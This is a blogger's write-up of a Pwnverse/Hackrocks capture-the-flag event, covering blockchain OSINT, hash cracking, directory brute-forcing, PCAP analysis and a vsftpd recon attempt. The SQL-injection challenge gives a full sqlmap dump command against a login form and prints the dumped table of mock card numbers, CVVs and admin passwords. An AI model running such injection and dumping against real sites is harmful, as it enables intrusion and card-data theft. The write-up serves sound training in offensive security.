Pwnverse CTF Writeup

Table of contents

No heading

No headings in the article.

I recently participated in a CTF created by Pwnverse and sponsored by Hackrocks. It contained 4 tiers with 2 challenges each.
Tiers were categorized by: Newbie (1,2), Easy (3,4), Medium (5,6), and Hard (7,8).
After completing 4 of these challenges successfully, I managed to secure 39th rank with a total of 155 points.

So without further ado let’s see what these challenges were & how I tackled them.

1. Corrupt Committee:-

Description: Our investigation team has discovered that some senior officials of a certain Olympic Committee have received significant bribes in the past, specifically in 2012. Unfortunately, we do not know much more; we only have the following image for you to start your investigation, which is somehow related to the recipient of the payment. Regarding the amount of the payment, we only know that it must be significantly higher than the rest of the payments received that year.

Can you help us bring the guilty parties to justice?

(The token of this challenge will be the identifier of the payers)

SOLUTION: There was a QR code given which had “1BWaryNxvEdkzRMZ6L4y2bgvBwhRyFTHQ2”, since this was a payment challenge my mind went straight to cryptocurrency. I searched this string on Blockchain.com and got 2 linked wallets. After searching through Bitcoin wallet by the year 2012, I got:

Fee 0.00000000 BTC(0.000 sat/B — 0.000 sat/WU — 258 bytes) +10.00000000 BTC

Hash b8d6559c52ad2c3137151a6eb091729d6d104e21a688549dc2a8557ab5e156b2: 2012–09–30 16:19
1Ce1DeJf6HHHKPBKH63qC7kzP6m2a3rDrr: 51.41448112 BTC

18nbMfiKjucUhs7tps6G8NGziPwK2MX9aZ: 41.41448112 BTC

1BWaryNxvEdkzRMZ6L4y2bgvBwhRyFTHQ2: 10.00000000 BTC

After entering the wallet address “1Ce1DeJf6HHHKPBKH63qC7kzP6m2a3rDrr” I pwned the 1st challenge.

2. Metaverse Cracking:-

Description: Do you like the metaverse, the NFTs, and cryptography, and would you like to help Juan earn money through a bug?

This is your challenge!

Not long ago Juan downloaded an NFT game with the idea of starting to earn cryptocurrencies. The game caught his attention because of the dynamics it followed.

The game consists of the following:

Random encrypted passwords are generated every day and the player can crack as many as he can and wants, as long as he has energy left. A user has 5 energy points per day, and for each play (hash detection attempt plus password cracking) 0.5 points are lost, i.e. the user has a total of 10 plays.
The interface is very simple: it consists of a screen with padlock cards and a brief description of how difficult or improbable it is to crack the generated password. The user chooses which padlock to attack, i.e. which password he wants to crack. Once he has chosen it, he clicks on the Crack button. Once this is done, the program returns on screen the hash and/or the password if it has been obtained along with two fields where the user must enter what has been obtained and press the Solve button.

The benefits that the player can get are:

Between 0.00008 ETH and 0.00021 ETH if the hash is successfully detected.
Between 0.00042 ETH and an additional 0.0012 ETH if the password is cracked.

To play the game you need a set of tools integrated into the game which are obtained by purchasing boxes. The 4 available boxes are:

demo (Free): contains a tool with 20% hash detection and 15% cracking probability.
Basic: contains a tool with 50% password hash detection probability and 25% cracking probability.
The intermediate: contains a tool with a hash detection probability of 80% and a cracking probability of 50%.
The pro: contains two separate tools, one with 100% hash detection and the other with 95% cracking probability. In other words, the pro provides two specialized tools that almost ensure profit.

If you buy, for example, the basic box and then the pro, the game detects you as if you had only the pro box, that is, bonuses are not accumulated, but it keeps the ones from the last purchased box.

Juan does not know very well if it is profitable to invest or not in the game, but before jumping to buy any box, he decides to try the demo that is free. After two plays he detects a bug in the game, and that is that the game calculates and displays the type of hash and the encrypted password before the user clicks on the Decrypt button.

John doesn’t understand much about cryptography, but he knows that there are tools (outside the game) to detect hashes and break passwords, so he asks you to help him crack one of the hardest passwords the game has thrown at him so far.

The information Juan saw on his screen was:

sha384

73a32b396debcb88809e534a6257ff32a67e70a0663740f538969c7741dfece93309f0dce80d57924602423cf8d3e0b9

Will you be able to make Juan earn some money? Help him crack the password in Clear, as well as the profit (in ETH) if he gets the maximum prize (express to 5 decimal places).

The token must be in the following format: counter-crypt-prize

Example answer: premio-3'21248

SOLUTION: Since everything was already given here including hash & algorithm, all that was left to do was crack it. I used “https://crackstation.net" which gave me “premio”. Now for 2nd part of the code, I simply added the highest benefits i.e, “0.00021+0.0012” & entered in the format “premio-0'00141”. However I didn’t think it would work but surprisingly it did.

3. LeChuck is back:-

Description: Where could they have started? Your instinct warns you: LeChuck has a big ego, and he’s probably left his signature somewhere on your site.

Is it that easy? Bingo! Something pops up at that URL https://challenges.hackrocks.com/lechuck
Look
for LeChuck’s footprints to move on!

SOLUTION: Since this was a website, I used /usr/share/wordlists/dirb/common.txt to find any open endpoints. For some reason first two attempts failed with Dirb, however, while using Gobuster I discovered an open one “https://challenges.hackrocks.com/lechuck/user" which said, “To get info about a user, use the syntax: /user/<username>”.

After this, it was simply including “lechuck” as the username and getting the flag “lechuck,{flag}MBZICNIBRM”.

4. Simon a Successful Streamer:

Description: That’s right, Simon Runbott has lost access to his bitcoins. He was storing them on an old Linux computer, which he has completely forgotten the password to access. At least he managed to send us a password file, which he hopes will help.

Can you recover Simon’s password?
Paswword hash: “simon:$6$ephwDW/dO/YUIRFq$4MtdliecaYjJ4dKIqbBbX3SsT8mebY3tdb6UdR0qMZk..0sgt7SjGQlhY/xiLLnzkaIB4gYb5lY./:18760:0:99999:7:::”

SOLUTION: I did find an account on Instagram “simon.runbott” and managed to extract some keywords “Audi, RTBB221, Cat, Django, 2018, however by the time I went back to try them CTF has been ended. So this challenge was not completed.

5. Attacking The Bad Guy:-

Description: Not all cybercriminals secure their communications or methods, so they can be tracked and sometimes even compromise their services.

In this case, “the bad guy” left a trace on his website, and you will have to break it to verify if your customer’s data is stored on it. Do you dare to hack the “hacker”?
[Challenges Second]
lenaff8

In the last couple of days, tickets have been received from our customers notifying and claiming money for purchases that they have not made, but both on our website and on other sites, that is, users are receiving unrequited money charges.

All of them agree that these charges are made after having made a purchase in our store. Following this rare occurrence, we called in our Blue Team to investigate the case. After reviewing both the logs and the web code, they managed to find a third-party library that captured the information of the bank cards as well as their CVV and expiration date. Additionally, analyzing said library they find the website to which the data was being sent, but they find a login and this team is not specialized in attacks of this style, so they request your help, so that you investigate said website, obtain access and check if the stored data is there, and more specifically, the data of Adrián Peréz Ríos, since he is an important buyer.

The challenge token will be: Adrián Pérez Ríos’s passwordadmin-numcard-cvv-expiredate or 0000000000–123–12/22 if it is not present.

Response example: admin12–4548812049400004–203–08/27
To access the challenge, click on the following link: https://challenges.hackrocks.com/bad-guy

SOLUTION: Since this one included a login portal, it was time to bring out Big guns. I used Burp Suite to intercept a login request “https://challenges.hackrocks.com/bad-guy/?username=asdfgh&password=asdfgh&login=Are+you+sure%3f" and passed it to Sqlmap with the syntax “sqlmap -u https://challenges.hackrocks.com/bad-guy/?username=asdfgh&password=asdfgh&login=Are+you+sure%3f — dump”.
This dumped two tables:
Database: filtrados
Table: cuentas
[10 entries]
+ — — + — — -+ — — — — — — — — — + — — — — — -+ — — — — — — — — — — — -+ — — — — — — — — — +
| id | cvv | name | fecha_cad | last_name | num_cuenta |
+ — — + — — -+ — — — — — — — — — + — — — — — -+ — — — — — — — — — — — -+ — — — — — — — — — +
| 1 | 100 | Mariola | 05/26 | Benítez Madroñal | 2683393655746243 |
| 2 | 321 | Claus | 03/24 | Grande Sanchez | 4866928395393289 |
| 3 | 345 | Imanol | 08/23 | Zabala | 4834966576322339 |
| 4 | 456 | María | 09/22 | Castañeda León | 6232573332859554 |
| 5 | 879 | Adrián | 07/25 | Pérez Ríos | 6269784865499645 |
| 6 | 20 | Francisco Javier | 02/26 | Sánchez Puente | 6478497458632956 |
| 7 | 107 | Mariola | 02/23 | Benítez de la Herranz | 4593769667235535 |
| 8 | 589 | Pepe | 06/24 | Rodríguez Escobar | 4982832873926876 |
| 9 | 986 | Jonathan | 04/23 | Garcia Soria | 7626334895889925 |
| 10 | 345 | Miguel Ángel | 05/23 | de los Santos Torres | 5633443968477687 |
+ — — + — — -+ — — — — — — — — — + — — — — — -+ — — — — — — — — — — — -+ — — — — — — — — — +

Database: filtrados
Table: usuarios
[2 entries]
+ — — — + — — — -+ — — — — — — — — — — +
| id_u | usu | contra |
+ — — — + — — — -+ — — — — — — — — — — +
| 1 | admin | 123456789987654321 |
| 2 | usu | 1234678 |
+ — — — + — — — -+ — — — — — — — — — — +

Now as per the given format, we had to enter like “Response example: admin12–4548812049400004–203–08/27” so I used “123456789987654321–6269784865499645–879–07/25” and voila, Bad guy pwned. One thing I would mention is in the case of pentest or production environment, I would never have used sqlmap such recklessly as it might have done serious disruption.

6. The Final Countdown:-

Description: Did you know that we at hackrocks have launched our own space program? In fact, we have decided to compete with Elon Musk and our ultimate goal is to reach Mars! Why not? :).

But for now, first stop, the moon. And we have already started with setbacks. Possibly due to the action of cosmic radiation, the countdown to the emergency launch of the module back to Earth has started. Unless our pilots can stop it in time, it will inevitably take off, whether they are on board or not.

As part of the ground crew, can you help them?

For security, this code is changed every few seconds. The commander has a hardware device, similar to an RSA key, which generates an OTP from the current code. However, the commander has lost it, and we don’t have time to send him another one!

File:RSA-SecurID-Token.jpg — Wikimedia Commons

Will you be able to stop the countdown by providing the next valid code after the current one at some point in time?
To access the challenge, click on the following link: https://challenges.hackrocks.com/launch-code/

SOLUTION: I looked at the website once and took rain check.

7. FTPing:-

Description: You should already know that, in the hacker universe, nothing is what it seems, nor is it where it should be. In this challenge you will have to face a lonely machine, which will not easily reveal its secrets to you. Ready to accept the challenge?

Of course, getting the token will not be easy at all. You will have to use different techniques, and chain several of them together. So enough chitchat for now.

Your target? The next machine:
assembly.hackrocks.com
Good luck!

SOLUTION: This challenge remained unsolved, however, this was a very interesting one as I managed to uncover some juicy details. Nonetheless, it was a deadend.
Details are as follows:
Domain = assembly.hackrocks.com
IP = 23.88.100.109
Hostname = static.109.100.88.23.clients.your-server.de
Operating System = Ubuntu 20.04
Open Ports = 22 (SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3) & 2121 (vsFTPd 2.3.4)
Now I said interesting before as this particular version of vsftpd has a particular “Backdoor Command Execution” vulnerability which seemed to be patched here. I tried multiple exploits including one available in Metasploit as well to no avail.

8. Santa Claus has Disappeared:-

Description: Santa Claus has been kidnapped! Christmas is in danger!

Of course, you cannot remain impassive, ¡help us! The problem is that we only have a network traffic capture that, we are sure, has been generated by Santa.

In this challenge:
You must find the geographic location of Santa.
You will learn to analyze traffic captures.
You must exercise your analytical and abstraction skills.

It’s terrible, Santa Claus has disappeared. Our agents suspect that The Grinch is behind this kidnapping. But, as always, it won’t be easy for us to find him. The only thing we have achieved is a traffic capture, obtained from a wireless interface, which we know has been generated by Santa himself to request help.

By the way, our little helpers inform us that the token to overcome this challenge will be Santa’s geographic location.

Ready to start?

SOLUTION: This challenge was not solved, however here is my analysis.
The PCAP file had some very interesting data and I managed to extract Santa’s private IP (192.168.1.84). This IP led me to some MAC addresses (80:78:71:8e:91:d0, c8:09:a8:75:14:b7) and IPs (95.216.99.248, 20.190.129.100, 52.113.205.16, 157.245.220.120). I also saw some searches made over port 80 ( help, how to make gorg, how to open locked doors, what is Stockholm syndrome). I tried to enter Stockholm as that is a city but it wasn’t the right answer.

I believe with more time on my hand at least 2 other challenges could have been solved. Nonetheless, this CTF served as a nice break and am looking forward to participating next year as well.